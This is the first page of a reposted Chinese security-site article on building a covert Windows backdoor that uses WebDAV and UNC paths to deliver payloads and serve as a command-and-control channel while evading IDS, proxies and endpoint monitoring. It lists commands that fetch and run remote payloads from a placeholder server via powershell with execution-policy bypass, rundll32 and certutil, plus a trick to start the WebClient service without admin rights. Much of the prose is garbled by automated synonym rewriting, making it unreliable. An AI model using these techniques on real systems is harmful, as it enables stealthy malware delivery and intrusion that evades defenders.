欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

运用WebDAV特性建立windows系统下隐蔽的后门

来源:本站整理 作者:佚名 时间:2017-09-21 TAG: 我要投稿

我近来不停想为Windows系统平台计划一个隐藏后门,重要功效是:
通报各类恶意病毒木马的payloads(shellcode,二进制文件,剧本等等...)
将其用作 C&C 通道
为了获得胜利,攻击者必需降服愈来愈多的挑衅,分外是在企业情况中:
绕过IDS / IPS
绕过各类防护软件(桌面,署理,邮件网关等)
署理感知和署理友爱
DFIR友爱,这里指从攻击者的角度来看
1.    测验考试应用被疏忽的通讯渠道
2.    防止在磁盘上操纵,或至多防止在今后无奈擦除的地位写入信息
3.    尽可以或许在内存中事情
不要触发变乱数据记录器:
1.    MS-Office二进制文件或剧本引擎(powershell,script host)履行HTTP哀求是很可疑的
2.    MS-Office二进制文件或剧本引擎(powershell,script host)在暂时文件夹中写入某些范例的文件是很可疑的
WebDAV协定具备许多风趣的特征,碰巧满意这些需要:
Windows操纵系统平台内置支撑此协定
许多内置的API函数,和应用这些API的二进制文件和敕令行工具,支撑UNC(通用定名商定)门路。这有几个长处:
1.    您不必要留意完成收集通讯部门(没有应用任何“罕用”的收集工具:Microsoft.XMLHTTP,WinHttp.WinHttpRequest,System.Net.WebClient)
2.    它将看起来像操纵系统平台正在履行收集哀求。 更确切地说,正在应用WebClient办事,是以咱们可以或许看到连接到WebDAV办事器的svchost.exe进程,而不是powershell.exe,cscript.exe,regsvr32.exe或任何MS-Office二进制文件
3.    它是署理感知和署理友爱的,假如必要,它可以或许应用署理身份验证
它可以或许通报署理(而不是一些纯TCP或UDP回调通道)
Windows UNC门路处置发掘
为了试验WebDAV,我起首应用一个简略的Docker映像树立一个WebDAV办事器:

docker pull visity / webdav
Windows操纵系统平台经由进程WebClient办事为WebDAV协定供给支撑。 必需起首启动此办事,以便敕令行工具和Windows API功效可以或许支撑指向WebDAV办事器的UNC门路。 风趣的是,我发明假如WebClient办事没有启动,那末尺度用户(即:没有管理员权限)不克不及经由进程惯例方法启动它(services.msc或sc start webclient),然则应用 pushd \\ webdav.server.com 敕令映照WebDAV同享上的虚构驱动器纵然从通俗用户也将主动启动办事。

一旦启动了WebClient办事,咱们就可以或许开端用一些咱们最喜爱的敕令行工具来检查他们能否支撑UNC指向咱们的WebDAV办事器。
这是我同时在Windows 7和Windows 10上停止测试的成果:
胜利的敕令:
powershell.exe -exec bypass -f \\webdav.server.com\payload.ps1
rundll32.exe \\webdav.server.com\payload.dll,entryPoint
certutil.exe -decode \\webdav.server.com\payload.b64 payload.dll
胜利的API挪用:
VBA: Dir("\\webdav.server.com\some\path\")
.Net: Directory.EnumerateFiles("\\webdav.server.com\some\path\")
失败的敕令:
regsvr32.exe /s /n /u /i:\\webdav.server.com\payload.sct scrobj.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\webdav.server.com\payload.xml
copy \\webdav.server.com\payload payload
xcopy \\webdav.server.com\payload payload
mshta \\webdav.server.com\payload.hta
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:payload.exe \\webdav.server.com\payload.cs
这些失败的敕令看上去与我想的不一致,由于在一些情况下,操纵系统平台彷佛可以或许经由进程长途文件系统平台拜访文件(经由进程WebClient办事经由进程WebDAV协定)供给某种形象层, 而在其余一些情况下,它却不可...这此中必定有一个缘故原由,但我找不到为何。
利害
到目前为止,应用指向WebDAV办事器的UNC门路证实具备以下长处:
1.    为了供给一些(初始)Payloads,不必要完成收集通讯部门。 这不仅是便利的,同时也可以或许防止被闻名的"System.Net.WebClient().DownloadString() powershell技能检测到。
2.    Svchost.exe是履行收集通讯的独一进程(EDR友爱)
3.    主动署理认识(包含认证),这在企业情况中是一个明白的“必需”。
但是,另有一些毛病:
1.    经由进程上述敕令中所示的UNC门路拜访/下载的一切有用载荷都邑在WedDAV客户端缓存(C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\)中当地复制。 这绝对不是对DFIR友爱,由于它在磁盘上写,就可以或许会触发当地防病毒软件。

2.    恶意病毒木马的Payloads仍旧会被诸如IPS之类的核心平安系统平台阻拦,或更有可以或许被Web署理防病毒软件阻拦。
那末咱们若何解脱这些缺点,并以一种聪慧的方法应用WebDAV作为供给Payloads的隐藏通道呢?
一些WebDAV外部组件 - OPTIONS / PROPFIND / GET
请记着,WebDAV只是HTTP协定的扩大,应用自己的一组HTTP动词(比方:PROPFIND,MKCOL,MOVE,LOCK等)和HTTP头(Depth,translate等),应用XML作为元数据传输的数据格局。
是以,当WebClient办事(即:WebDAV客户端)起首连接到WebDAV办事器时,它将经由进程履行以下哀求来扣问支撑的选项:
OPTIONS / HTTP/1.1
Connection: Keep-Alive

[1] [2] [3]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载